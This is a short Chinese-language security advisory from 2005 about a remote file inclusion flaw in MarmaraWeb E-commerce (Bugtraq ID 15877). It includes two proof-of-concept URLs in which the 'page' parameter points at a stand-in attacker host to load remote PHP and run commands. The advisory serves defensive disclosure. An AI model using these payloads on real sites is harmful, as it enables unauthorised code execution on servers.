安全研究

安全漏洞
MarmaraWeb E-Commerce远程文件包含漏洞

发布日期:2005-12-15
更新日期:2005-12-15

受影响系统:
MarmaraWeb E-commerce
描述:
BUGTRAQ  ID: 15877

MarmaraWeb E-commerce是用于运行网上商城的电子商务工具。

由于没有争取过滤用户输入,导致E-Commerce中存在远程文件包含漏洞。攻击者可以利用这个漏洞包含有恶意PHP脚本的任意文件并以Web Server进程的权限执行。

<*来源:B3g0k (B3g0k@hackermail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113469025516695&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[target]/index.php?page=http://yourevilcode?&cmd=
http://[target]/?page=http://yourevilcode?&cmd=

建议:
厂商补丁:

MarmaraWeb
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.marmaraweb.com/referanslar.php#eticaret

浏览次数:3024
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障